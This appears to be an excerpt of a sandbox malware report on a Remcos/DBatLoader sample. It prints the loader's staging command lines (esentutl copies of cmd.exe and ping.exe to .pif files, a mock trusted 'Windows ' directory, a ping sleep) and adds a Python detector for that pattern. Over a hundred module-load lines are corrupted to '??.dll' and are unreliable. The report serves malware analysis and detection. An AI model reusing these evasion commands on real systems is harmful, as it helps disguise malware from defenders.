              Source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine; Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@34/10@4/4
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 6_2_02936AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 19_2_02956AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Code function: 0_2_02D37FD2 GetDiskFreeSpaceA
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 6_2_0292E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Code function: 0_2_02D46DC8 CoCreateInstance
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 6_2_0293A63F FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 6_2_02939BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; File created: C:\Users\Public\Libraries\PNO
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3640:120:WilError_03
Source: C:\Windows\SysWOW64\SndVol.exe; Mutant created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: jW3NEKvxH1.exe; ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; File read: C:\Users\user\Desktop\jW3NEKvxH1.exe
Source: unknown; Process created: C:\Users\user\Desktop\jW3NEKvxH1.exe "C:\Users\user\Desktop\jW3NEKvxH1.exe"
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jW3NEKvxH1.exe /d C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF /o
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\esentutl.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif; Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: unknown; Process created: C:\Users\Public\Libraries\Dlaybpxl.PIF "C:\Users\Public\Libraries\Dlaybpxl.PIF"
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF; Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: unknown; Process created: C:\Users\Public\Libraries\Dlaybpxl.PIF "C:\Users\Public\Libraries\Dlaybpxl.PIF"
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF; Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
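The process-creation entries above show the DBatLoader staging sequence in full: esentutl in copy mode (`/y <src> /d <dst> /o`) duplicates cmd.exe and ping.exe into C:\Users\Public under .pif names, the renamed cmd.exe creates a mock trusted directory "C:\Windows \SysWOW64" (note the trailing space after "Windows"), the renamed ping.exe is used as a ten-second sleep, and the copies and directories are removed afterwards. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: a small Python detector that replays those command lines as (parent, command line) events and flags each stage, tracking which renamed copies map back to which system binary so later executions of alpha.pif and xpha.pif are attributed to cmd.exe and ping.exe. The event tuples are copied from the report; the final benign esentutl invocation, the event shape and the rule names are this example's own assumptions.

```python
"""Replay the report's process-creation command lines through a few
behavioural rules for the DBatLoader staging pattern.

Added example, not part of the Joe Sandbox report. The (parent, cmdline)
event shape and the rule names are this example's own conventions.
"""
import ntpath
import re
from dataclasses import dataclass

# Sample events: command lines copied from the report's "Process created"
# entries, in report order, plus one constructed benign esentutl call
# (database integrity check) that must not produce a finding.
SAMPLE_EVENTS = [
    (r"C:\Users\user\Desktop\jW3NEKvxH1.exe",
     r'C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" "'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o"),
    (r"C:\Users\user\Desktop\jW3NEKvxH1.exe",
     r"C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jW3NEKvxH1.exe /d C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF /o"),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o"),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10"),
    (r"C:\Users\Public\alpha.pif",
     r"C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10"),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64'),
    (r"C:\Users\Public\Libraries\Dlaybpxl.PIF",
     r"C:\Windows\System32\SndVol.exe"),
    # constructed benign control: esentutl used for its documented purpose
    (r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\esentutl.exe /p C:\Windows\WebCache\WebCacheV01.dat"),
]

# esentutl copy mode: /y <source> /d <destination> /o (paths without spaces)
ESENTUTL_COPY = re.compile(
    r"esentutl(?:\.exe)?\s+/y\s+(?P<src>\S+)\s+/d\s+(?P<dst>\S+)\s+/o", re.I)
# mkdir/rmdir argument, tolerating a missing closing quote as in the report
DIR_OP = re.compile(r'\b(mkdir|rmdir)\s+"?(.*?)"?\s*$', re.I)
# "ping 127.0.0.1 -n N" used as a sleep of roughly N-1 seconds
PING_SLEEP = re.compile(r"\b127\.0\.0\.1\s+-n\s+(\d+)")
EXEC_EXT = {".exe", ".com", ".pif", ".scr"}


@dataclass
class Finding:
    rule: str
    parent: str
    cmd: str
    detail: str


def norm(path: str) -> str:
    """Collapse the doubled backslashes shown in the report and drop quotes."""
    return path.replace("\\\\", "\\").strip('"')


def analyze(events):
    findings = []
    renamed = {}  # lower-case destination path -> original source path
    for parent, cmd in events:
        m = ESENTUTL_COPY.search(cmd)
        if m:
            src, dst = norm(m["src"]), norm(m["dst"])
            src_ext = ntpath.splitext(src)[1].lower()
            dst_ext = ntpath.splitext(dst)[1].lower()
            # A copy that changes the extension, or lands on an executable
            # extension, is staging rather than database maintenance.
            if src_ext != dst_ext or dst_ext in EXEC_EXT:
                renamed[dst.lower()] = src
                findings.append(Finding("esentutl_copy_rename", parent, cmd, f"{src} -> {dst}"))
        m = DIR_OP.search(cmd)
        if m:
            path = m.group(2)
            # Any path component with trailing whitespace ("Windows ") is a
            # mock trusted directory, only creatable via the \\?\ prefix.
            if any(part != part.rstrip() for part in path.split("\\")):
                findings.append(Finding("trailing_space_dir", parent, cmd, repr(path)))
        image = norm(cmd.split(None, 1)[0])
        origin = renamed.get(image.lower())
        if origin:
            findings.append(Finding("renamed_copy_exec", parent, cmd, f"{image} is a copy of {origin}"))
        parent_origin = renamed.get(norm(parent).lower())
        if parent_origin:
            findings.append(Finding("renamed_copy_parent", parent, cmd, f"parent is a copy of {parent_origin}"))
        m = PING_SLEEP.search(cmd)
        if m and ntpath.basename(origin or image).lower() in ("ping", "ping.exe"):
            findings.append(Finding("ping_sleep", parent, cmd, f"~{int(m.group(1)) - 1}s delay"))
    return findings


def summarize(events):
    """Count findings per rule; handy for a quick triage line."""
    counts = {}
    for f in analyze(events):
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] parent={f.parent}\n    {f.cmd}\n    {f.detail}")
    print(summarize(SAMPLE_EVENTS))
```

The stateful `renamed` map is the part worth keeping: on its own, a .pif launched from C:\Users\Public is only mildly suspicious, but once the copy has been tied to its source the later `alpha.pif /c mkdir "\\?\C:\Windows "` and `xpha.pif 127.0.0.1 -n 10` read as cmd.exe and ping.exe, which is how the report's own process tree should be read. Real telemetry (Sysmon event 1, EDR process events) carries the parent image and the original file name from the PE version resource, so in production the version-resource OriginalFileName replaces the esentutl bookkeeping for copies made by any other means.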
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Section loaded: version.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Section loaded: url.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Section loaded: userenv.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Section loaded: netutils.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe; Section loaded: 123 further entries whose module names did not survive extraction (rendered as ??.dll, one as ??????p??.dll)
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
